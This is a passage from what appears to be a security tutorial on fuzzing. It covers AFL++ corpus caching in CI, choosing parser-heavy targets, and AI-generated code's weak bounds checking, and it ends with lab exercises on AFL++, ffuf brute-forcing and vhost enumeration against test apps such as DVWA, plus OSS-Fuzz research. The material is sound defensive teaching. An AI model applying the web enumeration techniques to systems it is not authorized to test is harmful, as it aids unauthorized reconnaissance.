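#           if [ -n "$(ls -A findings/default/crashes 2>/dev/null)" ]; then
#             echo "Fuzzing found crashes!"
#             ls -la findings/default/crashes/
#             exit 1
#           fi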

# 3. Picking good fuzz targets
# Best candidates: parsing code, protocol handlers, format decoders
#   -- any code that processes external input and does complex logic
# Poor candidates: UI code, config file loading (usually simple),
#   pure computation without branching on input values

The corpus caching in the CI example is more important than it looks. On the first run, the fuzzer starts from scratch and spends time rediscovering the basic code paths. On subsequent runs, with the corpus restored from the cache, it starts from inputs that already cover those paths and immediately explores deeper territory. For this to work, the inputs AFL discovers (its queue directory) have to be copied back into the cached corpus directory after each run. Over weeks of CI runs, the corpus accumulates enough coverage that new mutations have to work harder to find unexplored code -- which is exactly where the interesting bugs live. Without corpus caching, every CI run starts over from zero and the fuzzing is far less effective per CPU-hour.

For target selection: not all code is equally worth fuzzing. The highest-value targets are parsers and decoders -- anything that reads external data and makes decisions based on its structure. An image parser (PNG, JPEG, WebP), a document format handler (PDF, DOCX, RTF), a network protocol implementation (TLS handshake parsing, DNS response parsing, HTTP/2 frame parsing) -- these are the functions where real-world vulnerabilities cluster, and where fuzzing has the highest yield. Code that does pure computation on validated inputs (sorting, math, string formatting with known-good data) is much less likely to have memory safety issues.

The AI Slop Connection

AI is changing fuzzing in both directions. AI-powered fuzzers use language models to generate structurally valid inputs that explore deeper code paths than random mutation -- essentially grammar-based fuzzing where the "grammar" is learned from real examples rather than hand-written. Google's research on ML-guided fuzzing has shown improvements in path coverage for complex protocols where random mutation gets stuck at early validation checks.

But AI also generates code that is particularly vulnerable to fuzzing. AI-generated parsers often lack bounds checking because the training data is full of insecure C patterns that "work" on expected inputs. AI-generated string handling uses strcpy and sprintf without length checks. AI-generated network code does not validate that a length field makes sense before using it as a malloc argument. Running a fuzzer against AI-generated code is almost guaranteed to find bugs -- usually within minutes, not hours. The code passes happy-path tests because the AI optimized for the common case. It fails catastrophically on unusual inputs because the AI never learned to consider the hostile case.

The lesson for developers: if you are shipping code -- AI-generated or otherwise -- that processes external input, fuzz it. There is no excuse for buffer overflows in new code when AFL++ finds them in 30 minutes on your laptop. The bugs that fuzzing catches are the bugs that attackers will find if you ship without testing ;-)

Exercises

Exercise 1: Install AFL++ and fuzz a simple C program. Write a function that parses a custom configuration file format (key=value lines, # for comments, [sections] for grouping). The parser should handle all three constructs and store results in a struct. Compile with afl-clang-fast and AddressSanitizer. Create 3 seed inputs (one for each feature: a comment-only file, a key=value file, a sectioned config). Fuzz for 30 minutes. Document: (a) total executions, (b) unique paths discovered, (c) any crashes found, (d) the ASAN report for the first crash if applicable. Save to ~/lab-notes/afl-exercise.md.

Exercise 2: Use ffuf to fuzz a web application in your lab (DVWA, Juice Shop, or any test app). Perform: (a) directory brute forcing against the root with raft-large-words.txt from SecLists, (b) GET parameter discovery on a known page that takes parameters (hint: try the login or search pages), (c) virtual host enumeration with a subdomains wordlist. For each run, document the filter flags you used and why. Compare ffuf's speed in requests/second against running the same wordlist with gobuster. Save to ~/lab-notes/ffuf-exercise.md.

Exercise 3: Research Google OSS-Fuzz statistics and one specific CVE found by fuzzing. Find: (a) the current total bug count and number of projects covered, (b) the top 5 projects by bugs found (check the OSS-Fuzz GitHub repo for the table), (c) the most common CWE categories in OSS-Fuzz findings (heap-buffer-overflow vs use-after-free vs others), (d) average time from bug report to fix across the project. Then pick ONE critical CVE that was discovered by automated fuzzing (Heartbleed, which Codenomicon found with its fuzzing tooling, or any other well-documented fuzz-discovered CVE; note that ImageMagick's CVE-2016-3714 does not qualify, it was a command injection found by manual research) and document: the fuzzing campaign that found it, the input that triggered it, and what code change fixed it. Save to ~/lab-notes/ossfuzz-research.md.


Thanks for reading!

@scipio


